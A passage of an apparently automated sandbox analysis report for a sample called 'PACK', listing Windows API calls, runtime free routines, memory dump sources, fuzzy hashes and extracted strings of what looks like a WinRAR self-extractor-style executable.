                                                                                                                                                                            • Instruction ID: 493a0fa91b598813b5cf7debdff43101b29a77833fc8a5973b7cc7d45cef9dd3
                                                                                                                                                                            • Opcode Fuzzy Hash: 5213091526e578c1e9d90b0da4d4091a14f415490eded06630d5e5246e695bc2
                                                                                                                                                                            • Instruction Fuzzy Hash: 1021A4725402947BE732ABE6CC46FFF766CAB45760F008021FA45A60C5CBB94D4297F0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8436
                                                                                                                                                                              • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
                                                                                                                                                                              • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8442
                                                                                                                                                                            • _free.LIBCMT ref: 00FF844D
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8458
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8463
                                                                                                                                                                            • _free.LIBCMT ref: 00FF846E
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8479
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8484
                                                                                                                                                                            • _free.LIBCMT ref: 00FF848F
                                                                                                                                                                            • _free.LIBCMT ref: 00FF849D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 87a6bff4a8f2b6a37fe2eaac2002d175dd7d9332e144f27385020db4c22e5e0b
                                                                                                                                                                            • Instruction ID: d8d8ed73cd10e92ecc68e7a7a36ee100c251ba08c873c923c26243c07bc7a645
                                                                                                                                                                            • Opcode Fuzzy Hash: 87a6bff4a8f2b6a37fe2eaac2002d175dd7d9332e144f27385020db4c22e5e0b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0311777551420CEFCB01FF64CC42CEE7B65EF05750B525195FA198B172DA39EB60AB80
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                                                                                                            • API String ID: 0-2277559157
                                                                                                                                                                            • Opcode ID: 28a91c9f7f6d320a7c3ec695642b886e86b01f41e6b148144e8c3780492c2174
                                                                                                                                                                            • Instruction ID: 507c5df510423c5496dcbfd05a0b952798df110ea99111b1ed5d94a54613d24d
                                                                                                                                                                            • Opcode Fuzzy Hash: 28a91c9f7f6d320a7c3ec695642b886e86b01f41e6b148144e8c3780492c2174
                                                                                                                                                                            • Instruction Fuzzy Hash: 83F12531A043415ADB55EF248C95BAE779B6FA0310F0C446BFD858B383DA68D948F7E2
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00FFEA62,00000000,00000000,00000000,00000000,00000000,00FF3FBF), ref: 00FFE32F
                                                                                                                                                                            • __fassign.LIBCMT ref: 00FFE3AA
                                                                                                                                                                            • __fassign.LIBCMT ref: 00FFE3C5
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00FFE3EB
                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,00FFEA62,00000000,?,?,?,?,?,?,?,?,?,00FFEA62,00000000), ref: 00FFE40A
                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000001,00FFEA62,00000000,?,?,?,?,?,?,?,?,?,00FFEA62,00000000), ref: 00FFE443
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 1324828854-3080146196
                                                                                                                                                                            • Opcode ID: ba306718d7bf4527a8d017128203b5a5df9dc914a2dfd76aff2c43151d2874d6
                                                                                                                                                                            • Instruction ID: d6b5d5a1b47ba41ffbb258002c174b056bececc00bf3a347fac331b8fed2a3d3
                                                                                                                                                                            • Opcode Fuzzy Hash: ba306718d7bf4527a8d017128203b5a5df9dc914a2dfd76aff2c43151d2874d6
                                                                                                                                                                            • Instruction Fuzzy Hash: 6151B3B5E002499FCB10CFA8D885BFEBBF9EF08310F14411AE655E72A1D7349A45CB64
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00FEA431
                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FEA45E
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00FEA473
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00FEA484
                                                                                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00FEA48D
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00FEA4A1
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00FEA4B3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                            • String ID: LICENSEDLG
                                                                                                                                                                            • API String ID: 3214253823-2177901306
                                                                                                                                                                            • Opcode ID: 4b249684ec9106cec0f7d1a5830ba024dbb5e74d8903b3379332f72af2cfab73
                                                                                                                                                                            • Instruction ID: 191395e30de718fc3453056dd2910a223468ba784b375dc163a33aaca0550236
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b249684ec9106cec0f7d1a5830ba024dbb5e74d8903b3379332f72af2cfab73
                                                                                                                                                                            • Instruction Fuzzy Hash: 5921BA326441447BD632AFB6DC89F7B7B6DEB46754F018018F680E51D4CBABAC01A772
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD926D
                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00FD9290
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00FD92AF
                                                                                                                                                                              • Part of subcall function 00FE1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00FDACFE,?,?,?,00FDACAD,?,-00000002,?,00000000,?), ref: 00FE1426
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FD934B
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00FD93C0
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00FD93FC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                                                                                            • String ID: rtmp%d
                                                                                                                                                                            • API String ID: 2111052971-3303766350
                                                                                                                                                                            • Opcode ID: c5ef9155c036d88e637bd629a37a3dc3beb67e62951e522eb8686db46166aa43
                                                                                                                                                                            • Instruction ID: 4e62277e9e108553ac7f34a5f061236a2735ac6974ccfb2c0f84fc1d24a076d4
                                                                                                                                                                            • Opcode Fuzzy Hash: c5ef9155c036d88e637bd629a37a3dc3beb67e62951e522eb8686db46166aa43
                                                                                                                                                                            • Instruction Fuzzy Hash: A741D472905258A6DF20EBE0CC44FEE737EAF05380F0884A7B504E3242DA789B45EB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00FE06F3
                                                                                                                                                                              • Part of subcall function 00FDA995: GetVersionExW.KERNEL32(?), ref: 00FDA9BA
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00FE071C
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00FE072E
                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00FE073B
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE0751
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE075D
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FE0793
                                                                                                                                                                            • __aullrem.LIBCMT ref: 00FE081D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1247370737-0
                                                                                                                                                                            • Opcode ID: 07d7abd5a8326a803048a79045150d63eafecee7cd5e8ece6a58b38c3594dc66
                                                                                                                                                                            • Instruction ID: 6ae18e9de8bea2404f3f88ad71338f38cd0ce156e52df886439154a29b6a0829
                                                                                                                                                                            • Opcode Fuzzy Hash: 07d7abd5a8326a803048a79045150d63eafecee7cd5e8ece6a58b38c3594dc66
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E4139B64083459FC310DF65C8809ABF7E9FF88714F004A2EF5D692640EB79E588DB52
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 269201875-3080146196
                                                                                                                                                                            • Opcode ID: 4ff50e685948fdcc9b633c78aaa7b11763e2fc576b9d327b08e2bd741e0af31a
                                                                                                                                                                            • Instruction ID: 1c6868904fa848179840f28c08b53866af782bec6f3daa904e6d4c3e71c939fb
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ff50e685948fdcc9b633c78aaa7b11763e2fc576b9d327b08e2bd741e0af31a
                                                                                                                                                                            • Instruction Fuzzy Hash: 60419336E00308DFCB14EF78C881A6EB7A5EF89724B154569E615EB351D735ED01EB80
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FE87A0), ref: 00FE8994
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FE89B5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocByteCharGlobalMultiWide
                                                                                                                                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                            • API String ID: 3286310052-4209811716
                                                                                                                                                                            • Opcode ID: b3eb9ad59160a987cddfaba8ace57c00f5a668fd1e4496aae2acae072b2b8127
                                                                                                                                                                            • Instruction ID: 6babd940932d2d90d476b3b7120d02862f846373d326ead05ae4d09e61c0ecba
                                                                                                                                                                            • Opcode Fuzzy Hash: b3eb9ad59160a987cddfaba8ace57c00f5a668fd1e4496aae2acae072b2b8127
                                                                                                                                                                            • Instruction Fuzzy Hash: DD3168328043457EE316BB62DC06FBF7798DF51B60F10451EF6189A0D2EF79980693A6
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00FE8FFF
                                                                                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00FE9044
                                                                                                                                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00FE90DB
                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00FE90E3
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00FE90F9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$RectText
                                                                                                                                                                            • String ID: RarHtmlClassName
                                                                                                                                                                            • API String ID: 3937224194-1658105358
                                                                                                                                                                            • Opcode ID: 464a7ff4d74b84aa72de1030b58081d819b87f157e04e01bf4b87cabb3afdbf8
                                                                                                                                                                            • Instruction ID: 13e0d42973400a7d4a7ffaa9aa3bd218dcc687679101cd02ef7f83de4561400f
                                                                                                                                                                            • Opcode Fuzzy Hash: 464a7ff4d74b84aa72de1030b58081d819b87f157e04e01bf4b87cabb3afdbf8
                                                                                                                                                                            • Instruction Fuzzy Hash: CB31A431408244AFC7229FA59C48BABBBA9EF48751F008559FD899A156CB7AD800DB71
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FFB4CA: _free.LIBCMT ref: 00FFB4F3
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB554
                                                                                                                                                                              • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
                                                                                                                                                                              • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB55F
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB56A
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB5BE
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB5C9
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB5D4
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB5DF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                                                                                                                                                                            • Instruction ID: 742fb68744ea9511d77757247338edf17962f81c3e940589785dc950f0a346a8
                                                                                                                                                                            • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                                                                                                                                                                            • Instruction Fuzzy Hash: 3711FCB2544B08AAD620FBB0DD0AFEFB79C6F05B00F404816B79E66077DB6DB6146660
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00FF168B,00FEF0E2), ref: 00FF16A2
                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FF16B0
                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FF16C9
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00FF168B,00FEF0E2), ref: 00FF171B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                            • Opcode ID: 2d838901c673552e2155c06b3a204b1216e78f5ecf9afc2ecfcc6966c76d4b88
                                                                                                                                                                            • Instruction ID: 0aace30aae9fa596ee973db178b14432517d317fd1dff6995d7ebd960216ff41
                                                                                                                                                                            • Opcode Fuzzy Hash: 2d838901c673552e2155c06b3a204b1216e78f5ecf9afc2ecfcc6966c76d4b88
                                                                                                                                                                            • Instruction Fuzzy Hash: CB01DE3264831A9AA7262AB47C896363B48FF013B1B20032AF318910F6EF5A4800B364
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                            • API String ID: 0-1718035505
                                                                                                                                                                            • Opcode ID: 2e87c2ac00e3ec3ac11691a9e8e30f811b53792a7b294c98e06cbd35f45f17c0
                                                                                                                                                                            • Instruction ID: 4421964a53bb3a07980bd8bb38fad0008c92c15d719448318e254b71f26801a8
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e87c2ac00e3ec3ac11691a9e8e30f811b53792a7b294c98e06cbd35f45f17c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 8001F472F413E35B5F335EB75C94A972398AA02B6A320113EEBC0D7A01E756C801F7A0
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FF6B29,?,?,00FF6AC9,?,0100A800,0000000C,00FF6C20,?,00000002), ref: 00FF6B98
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FF6BAB
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00FF6B29,?,?,00FF6AC9,?,0100A800,0000000C,00FF6C20,?,00000002,00000000), ref: 00FF6BCE
